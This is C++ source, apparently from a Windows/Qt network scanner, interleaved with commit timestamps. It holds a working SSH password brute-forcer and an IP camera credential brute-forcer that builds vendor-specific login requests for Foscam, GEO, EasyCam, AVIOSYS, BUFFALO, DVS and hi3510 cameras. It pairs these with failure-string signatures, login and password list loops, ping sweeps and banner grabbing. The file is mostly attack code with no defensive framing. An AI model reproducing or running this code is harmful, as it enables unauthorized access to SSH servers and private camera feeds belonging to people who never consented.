if ( globalScanFlag = = false ) break ;
strcpy ( temp , sshlpLst [ i ] ) ;
ptr1 = strstr ( temp , " : " ) ;
sz = ptr1 - temp ;
strncpy ( login , temp , sz ) ;
strcpy ( pass , ptr1 + 1 ) ;
2014-09-19 19:27:28 +00:00
res = check_ssh_pass ( login , pass , temp , host , port , CSTR , banner ) ;
ZeroMemory ( login , sizeof ( login ) ) ;
ZeroMemory ( pass , sizeof ( pass ) ) ;
ZeroMemory ( temp , sizeof ( temp ) ) ;
2014-09-07 18:54:46 +00:00
if ( res = = 0 )
{
SSHConDec ( ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
return 0 ;
}
else if ( res = = - 2 )
{
SSHConDec ( ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
return - 2 ;
} ;
Sleep ( 500 ) ;
} ;
SSHConDec ( ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
return - 1 ;
} ;
# pragma endregion
# pragma region IPCAMWeb
int _webLoginSeq ( char * request , char * login , char * pass , char * ip , int port , int passCounter , char * type , std : : vector < char * > negVector )
{
char recvBuff [ 256 ] = { 0 } ;
char recvBuff2 [ 4096 ] = { 0 } ;
SOCKET sock ;
sockaddr_in sockAddr ;
int bTO ;
sockAddr . sin_family = AF_INET ;
sockAddr . sin_port = htons ( port ) ;
HOSTENT * host ;
# if defined(WIN32)
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . S_un . S_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
{
2014-09-19 19:27:28 +00:00
return - 1 ;
2014-09-07 18:54:46 +00:00
} ;
# else
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . s_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
{
2014-09-19 19:27:28 +00:00
return - 1 ;
2014-09-07 18:54:46 +00:00
} ;
# endif
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
int cCode = connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
int cErrCode = WSAGetLastError ( ) ;
while ( cErrCode = = 10038 )
{
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
cCode = connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
cErrCode = WSAGetLastError ( ) ;
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " [ " + QString ( type ) + " ] 10038 occured -- [ " + QString ( ip ) + " : " + QString : : number ( port ) + " ] " ) ;
} ;
if ( cCode ! = SOCKET_ERROR )
{
int x = 1 ;
Activity + = strlen ( request ) ;
if ( send ( sock , request , strlen ( request ) , 0 ) = = SOCKET_ERROR )
{
stt - > doEmitionRedFoundData ( " [ " + QString ( type ) + " ] Send error! [ " + QString ( ip ) + " ] " ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
return 0 ;
}
else
{
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( ip ) , QString ( request ) ) ;
int x = 1 ;
int xx = 0 ;
ZeroMemory ( recvBuff2 , sizeof ( recvBuff2 ) ) ;
while ( xx < 3072 )
{
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
x = recvWT ( sock , recvBuff , sizeof ( recvBuff ) , gTimeOut + 2 , & bTO ) ;
if ( x < = 0 ) break ;
strncat ( recvBuff2 , recvBuff , x ) ;
xx + = x ;
Activity + = x ;
} ;
if ( BALogSwitched ) stt - > doEmitionBAData ( " Checked " + QString ( type ) + " : " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " + QString ( login ) + " : " + QString ( pass ) + " ; - Progress: ( " + QString : : number ( ( passCounter / ( double ) ( MaxPass * MaxLogin ) ) * 100 ) . mid ( 0 , 4 ) + " %) " ) ;
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( recvBuff2 ) ) ;
bool result = true ;
for ( int i = 0 ; i < negVector . size ( ) ; + + i )
{
if ( strstri ( recvBuff2 , negVector [ i ] ) ! = NULL )
{
result = false ;
break ;
} ;
} ;
if ( result )
{
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
return 1 ;
} ;
} ;
} ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
return 0 ;
} ;
lopaStr _IPCameraBrute ( char * ip , int port , char * SPEC )
{
lopaStr lps ;
ZeroMemory ( lps . login , sizeof ( lps . login ) ) ;
ZeroMemory ( lps . pass , sizeof ( lps . pass ) ) ;
ZeroMemory ( lps . other , sizeof ( lps . other ) ) ;
char login [ 128 ] = { 0 } ;
char pass [ 128 ] = { 0 } ;
char request [ 1024 ] = { 0 } ;
2014-10-26 15:05:51 +00:00
isActive = 1 ;
2014-09-07 18:54:46 +00:00
int passCounter = 1 ;
std : : vector < char * > negVector ;
if ( strcmp ( SPEC , " IPC " ) = = 0 )
{
negVector . push_back ( " <UserGroup>Invalid</UserGroup> " ) ;
}
else if ( strcmp ( SPEC , " GEO " ) = = 0 )
{
negVector . push_back ( " Access denied " ) ;
negVector . push_back ( " ErrNoSuchUsr.htm " ) ;
}
else if ( strcmp ( SPEC , " EasyCam " ) = = 0 )
{
negVector . push_back ( " Set-Cookie: usrLevel=-1;path=/ " ) ;
}
else if ( strcmp ( SPEC , " Foscam " ) = = 0 )
{
negVector . push_back ( " <result>0</result> " ) ;
negVector . push_back ( " <result>-1</result> " ) ;
negVector . push_back ( " <result>-2</result> " ) ;
negVector . push_back ( " <result>-3</result> " ) ;
negVector . push_back ( " <result>-4</result> " ) ;
negVector . push_back ( " <result>-5</result> " ) ;
negVector . push_back ( " <result>-6</result> " ) ;
negVector . push_back ( " <result>-7</result> " ) ;
}
else if ( strcmp ( SPEC , " AVIOSYS " ) = = 0 )
{
negVector . push_back ( " Password Error " ) ;
}
2014-11-02 09:53:50 +00:00
else if ( strcmp ( SPEC , " BUFFALO " ) = = 0 )
{
negVector . push_back ( " 403 Forbidden " ) ;
}
2014-11-23 11:47:22 +00:00
else if ( strcmp ( SPEC , " DVS " ) = = 0 )
{
negVector . push_back ( " Non-Existed " ) ;
}
2014-11-23 18:32:50 +00:00
else if ( strcmp ( SPEC , " IPCAM " ) = = 0 )
{
negVector . push_back ( " var check= \" 0 \" " ) ;
negVector . push_back ( " var authLevel = \" 0 \" ; " ) ;
}
2014-09-07 18:54:46 +00:00
else
{
stt - > doEmitionRedFoundData ( " [_IPCameraBrute] No \" SPEC \" specified! " ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
for ( int i = 0 ; i < MaxLogin ; i + + )
{
if ( globalScanFlag = = false ) break ;
if ( strcmp ( loginLst [ i ] , " " ) = = 0 ) continue ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( login , sizeof ( login ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( login , loginLst [ i ] ) ;
for ( int j = 0 ; j < MaxPass ; j + + )
{
if ( globalScanFlag = = false ) break ;
if ( strcmp ( passLst [ j ] , " " ) = = 0 ) continue ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( pass , sizeof ( pass ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( pass , passLst [ j ] ) ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , sizeof ( request ) ) ;
2014-09-07 18:54:46 +00:00
if ( strcmp ( SPEC , " IPC " ) = = 0 )
{
strcpy ( request , " GET /login.xml?user= " ) ;
strcat ( request , login ) ;
strcat ( request , " &usr= " ) ;
strcat ( request , login ) ;
strcat ( request , " &password= " ) ;
strcat ( request , pass ) ;
strcat ( request , " &pwd= " ) ;
strcat ( request , pass ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
2014-11-02 09:53:50 +00:00
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
} ;
2014-09-09 00:36:46 +00:00
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
2014-09-07 18:54:46 +00:00
}
else if ( strcmp ( SPEC , " GEO " ) = = 0 )
{
strcpy ( request , " GET /Login.cgi?username= " ) ;
strcat ( request , login ) ;
strcat ( request , " &password= " ) ;
strcat ( request , pass ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
2014-11-02 09:53:50 +00:00
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
} ;
2014-09-09 00:36:46 +00:00
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
2014-09-07 18:54:46 +00:00
}
else if ( strcmp ( SPEC , " EasyCam " ) = = 0 )
{
strcpy ( request , " GET /login.xml?user= " ) ;
strcat ( request , login ) ;
strcat ( request , " &usr= " ) ;
strcat ( request , login ) ;
strcat ( request , " &password= " ) ;
strcat ( request , pass ) ;
strcat ( request , " &pwd= " ) ;
strcat ( request , pass ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
2014-11-02 09:53:50 +00:00
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
} ;
2014-09-09 00:36:46 +00:00
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
2014-09-07 18:54:46 +00:00
}
else if ( strcmp ( SPEC , " Foscam " ) = = 0 )
{
strcpy ( request , " GET /cgi-bin/CGIProxy.fcgi?usr= " ) ;
strcat ( request , login ) ;
strcat ( request , " &pwd= " ) ;
strcat ( request , pass ) ;
strcat ( request , " &cmd=logIn&usrName= " ) ;
strcat ( request , login ) ;
strcat ( request , " &pwd= " ) ;
strcat ( request , pass ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
2014-11-02 09:53:50 +00:00
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
} ;
2014-09-09 00:36:46 +00:00
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
2014-09-07 18:54:46 +00:00
}
else if ( strcmp ( SPEC , " AVIOSYS " ) = = 0 )
{
strcpy ( request , " GET /check_user.html?UserName= " ) ;
strcat ( request , login ) ;
strcat ( request , " &PassWord= " ) ;
strcat ( request , pass ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
2014-11-02 09:53:50 +00:00
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
} ;
2014-09-09 00:36:46 +00:00
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
2014-11-02 09:53:50 +00:00
}
else if ( strcmp ( SPEC , " BUFFALO " ) = = 0 )
{
strcpy ( request , " POST /rpc/login HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: keep-alive " ) ;
int loginLength = strlen ( login ) ;
int passLength = strlen ( pass ) ;
int sz = loginLength + passLength + strlen ( " user=&password= " ) ;
char * passString = new char [ sz + 1 ] ;
ZeroMemory ( passString , sizeof ( passString ) ) ;
strcpy ( passString , " user= " ) ;
strcat ( passString , login ) ;
strcat ( passString , " &password= " ) ;
strcat ( passString , pass ) ;
strcat ( request , " \r \n Content-Length: " ) ;
char tempBuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( sz , tempBuff , 10 ) ) ;
strcat ( request , " \r \n \r \n " ) ;
strcat ( request , passString ) ;
delete [ ] passString ;
2014-11-23 11:47:22 +00:00
}
else if ( strcmp ( SPEC , " DVS " ) = = 0 )
{
strcpy ( request , " POST /login HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: keep-alive " ) ;
int loginLength = strlen ( login ) ;
int passLength = strlen ( pass ) ;
int sz = loginLength + passLength + strlen ( " langs=en&user=&password=&submit=+Login+ " ) ;
char * passString = new char [ sz + 1 ] ;
ZeroMemory ( passString , sizeof ( passString ) ) ;
strcpy ( passString , " langs=en&user= " ) ;
strcat ( passString , login ) ;
strcat ( passString , " &password= " ) ;
strcat ( passString , pass ) ;
strcat ( passString , " &submit=+Login+ " ) ;
strcat ( request , " \r \n Content-Length: " ) ;
char tempBuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( sz , tempBuff , 10 ) ) ;
strcat ( request , " \r \n \r \n " ) ;
strcat ( request , passString ) ;
delete [ ] passString ;
2014-11-23 18:32:50 +00:00
}
else if ( strcmp ( SPEC , " IPCAM " ) = = 0 )
{
strcpy ( request , " GET /cgi-bin/hi3510/checkuser.cgi?&-name= " ) ;
strcat ( request , login ) ;
strcat ( request , " &-passwd= " ) ;
strcat ( request , pass ) ;
strcat ( request , " &-time=1416767330831 HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
2014-09-19 19:27:28 +00:00
} ;
2014-09-07 18:54:46 +00:00
2014-09-19 19:27:28 +00:00
int res = _webLoginSeq ( request , login , pass , ip , port , passCounter , SPEC , negVector ) ;
if ( res = = 1 )
{
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-19 19:27:28 +00:00
strcpy ( lps . login , loginLst [ i ] ) ;
strcpy ( lps . pass , passLst [ j ] ) ;
return lps ;
}
else if ( res = = - 1 )
{
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-19 19:27:28 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
2014-09-07 18:54:46 +00:00
} ;
+ + passCounter ;
} ;
} ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
lopaStr Connector : : _IPCameraBLobby ( char * ip , int port , char * SPEC )
{
2014-09-19 19:27:28 +00:00
while ( BrutingThrds > = gMaxBrutingThreads ) Sleep ( 1000 ) ;
2014-09-07 18:54:46 +00:00
BConInc ( ) ;
lopaStr res = _IPCameraBrute ( ip , port , SPEC ) ;
BConDec ( ) ;
return res ;
} ;
# pragma endregion
int _pingMyTarget ( char * ip )
{
HANDLE hIcmpFile ;
unsigned long ipaddr = INADDR_NONE ;
DWORD dwRetVal = 0 ;
char SendData [ 32 ] = " Data Buffer " ;
LPVOID ReplyBuffer = NULL ;
DWORD ReplySize = 0 ;
ipaddr = inet_addr ( ip ) ;
if ( ipaddr = = INADDR_NONE )
{
stt - > doEmitionRedFoundData ( " [Pinger] INADDR_NONE! [ " + QString ( ip ) + " ] " ) ;
return 0 ;
}
hIcmpFile = IcmpCreateFile ( ) ;
if ( hIcmpFile = = INVALID_HANDLE_VALUE )
{
stt - > doEmitionRedFoundData ( " [Pinger] Unable to open handle. [ " + QString : : number ( GetLastError ( ) ) + " ] " ) ;
return 0 ;
}
ReplySize = sizeof ( ICMP_ECHO_REPLY ) + sizeof ( SendData ) ;
ReplyBuffer = ( VOID * ) malloc ( ReplySize ) ;
if ( ReplyBuffer = = NULL )
{
stt - > doEmitionRedFoundData ( " [Pinger] Unable to allocate memory. " ) ;
return 0 ;
}
dwRetVal = IcmpSendEcho ( hIcmpFile , ipaddr , SendData , sizeof ( SendData ) ,
NULL , ReplyBuffer , ReplySize , gPingTimeout ) ;
if ( dwRetVal ! = 0 ) {
PICMP_ECHO_REPLY pEchoReply = ( PICMP_ECHO_REPLY ) ReplyBuffer ;
struct in_addr ReplyAddr ;
ReplyAddr . S_un . S_addr = pEchoReply - > Address ;
printf ( " \t Sent icmp message to %s \n " , " 127.0.0.1 " ) ;
if ( dwRetVal > 1 )
{
if ( gDebugMode ) stt - > doEmitionYellowFoundData ( " [Pinger] Received " + QString : : number ( dwRetVal ) + " icmp message responses. " ) ;
}
else
{
if ( gDebugMode ) stt - > doEmitionYellowFoundData ( " [Pinger] Received " + QString : : number ( dwRetVal ) + " icmp message responses. " ) ;
}
if ( gDebugMode ) stt - > doEmitionYellowFoundData ( " [Pinger] Received from: " + QString ( inet_ntoa ( ReplyAddr ) ) + " ; Status = " + QString : : number ( pEchoReply - > Status ) + " ; Roundtrip time = " + QString : : number ( pEchoReply - > RoundTripTime ) + " ms. " ) ;
return 1 ;
}
else
{
printf ( " \t Call to IcmpSendEcho failed. \n " ) ;
printf ( " \t IcmpSendEcho returned error: %ld \n " , GetLastError ( ) ) ;
if ( gDebugMode ) stt - > doEmitionRedFoundData ( " [Pinger] Call to IcmpSendEcho failed. IcmpSendEcho returned error: " + QString : : number ( GetLastError ( ) ) ) ;
return 0 ;
} ;
} ;
QString strIP ;
QString strPort ;
const char * buff1 = " GET / HTTP/1.1 \r \n Host: " ;
2014-09-09 00:36:46 +00:00
const char * buff2 = " \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: us-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Connection: close \r \n \r \n " ;
2014-11-01 18:31:40 +00:00
int Connector : : _SSHLobby ( char * ip , int port , conSTR * CSTR )
2014-09-19 19:27:28 +00:00
{
char banner [ 256 ] = { 0 } ;
strncpy ( banner , _get_ssh_banner ( ip , port ) , 256 ) ;
if ( strlen ( banner ) > 0 )
{
return _EstablishSSHConnection ( ip , port , CSTR , banner ) ;
} ;
} ;
2014-10-19 10:39:27 +00:00
int Connector : : _ConnectToPort ( char * ip , const char * portC , char * hl )
2014-09-07 18:54:46 +00:00
{
if ( gPingNScan )
{
if ( _pingMyTarget ( ip ) = = 0 )
{
2014-10-19 10:39:27 +00:00
return - 2 ;
2014-09-07 18:54:46 +00:00
} ;
} ;
2014-09-19 19:27:28 +00:00
char mes [ 512 ] = { 0 } ;
conSTR CSTR ;
CSTR . lowerBuff = NULL ;
CSTR . size = 0 ;
int strFlag = 0 ;
strcpy ( mes , buff1 ) ;
strcat ( mes , ip ) ;
int port = atoi ( portC ) ;
2014-11-02 09:53:50 +00:00
if ( port ! = 80 ) {
strcat ( mes , " : " ) ;
strcat ( mes , portC ) ;
} ;
strcat ( mes , buff2 ) ;
2014-09-19 19:27:28 +00:00
int cRes ;
2014-09-07 18:54:46 +00:00
2014-10-19 10:39:27 +00:00
if ( port = = 443 ) cRes = _EstablishSSLConnection ( ip , port , mes , & CSTR ) ;
2014-09-19 19:27:28 +00:00
else if ( port = = 22 ) cRes = _SSHLobby ( ip , port , & CSTR ) ;
2014-10-19 10:39:27 +00:00
else cRes = _EstablishConnection ( ip , port , mes , & CSTR ) ;
2014-09-19 19:27:28 +00:00
int size = CSTR . size ;
2014-10-19 10:39:27 +00:00
if ( cRes = = - 2 ) return - 2 ;
2014-09-19 19:27:28 +00:00
if ( size > 0 & & cRes ! = - 1 )
{
+ + Alive ;
+ + found ;
stt - > doEmitionChangeParsed ( QString : : number ( saved ) + " / " + QString : : number ( found ) ) ;
Lexems lx ;
lx . _filler ( port , CSTR . lowerBuff , ip , size , & lx , hl ) ;
delete [ ] CSTR . lowerBuff ;
CSTR . lowerBuff = NULL ;
} ;
if ( CSTR . lowerBuff ! = NULL )
{
delete [ ] CSTR . lowerBuff ;
CSTR . lowerBuff = NULL ;
} ;
strFlag = 1 ;
2014-09-07 18:54:46 +00:00
} ;